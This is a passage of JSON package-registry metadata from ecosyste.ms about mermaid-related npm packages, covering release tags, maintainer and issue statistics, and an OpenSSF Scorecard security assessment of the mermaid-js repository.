.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.398Z","dependent_packages_count":0,"downloads":0,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.122662779541514,"dependent_packages_count":52.636007497571505,"stargazers_count":0.08654840569401306,"forks_count":0.4840669144282206,"docker_downloads_count":null,"average":22.582321399308814},"purl":"pkg:npm/mermaid-eden","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mermaid-eden","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mermaid-eden","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mermaid-eden/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-eden/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-eden/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-eden/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-eden/related_packages","maintainers":[{"uuid":"sarfudheen","login":"sarfudheen","name":null,"email":"sarfu_dheen@yahoo.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~sarfudheen","role":null,"created_at":"2023-10-17T15:19:13.708Z","updated_at":"2023-10-17T15:19:13.708Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sarfudheen/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8597647,"name":"@mermaid-js/flowchart-elk","ecosystem":"npm","description":"Flowchart plugin for mermaid with ELK layout","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","elk","mermaid"],"namespace":"mermaid-js","versions_count":1,"first_release_published_at":"2023-11-25T05:23:05.097Z","latest_release_published_at":"2023-11-25T05:23:05.097Z","latest_release_number":"1.0.0-rc.1","last_synced_at":"2025-09-01T12:55:58.698Z","created_at":"2023-11-25T05:23:12.806Z","updated_at":"2025-09-01T14:17:50.640Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/flowchart-elk","install_command":"npm install @mermaid-js/flowchart-elk","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"1.0.0-rc.1","latest":"1.0.0-rc.1"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.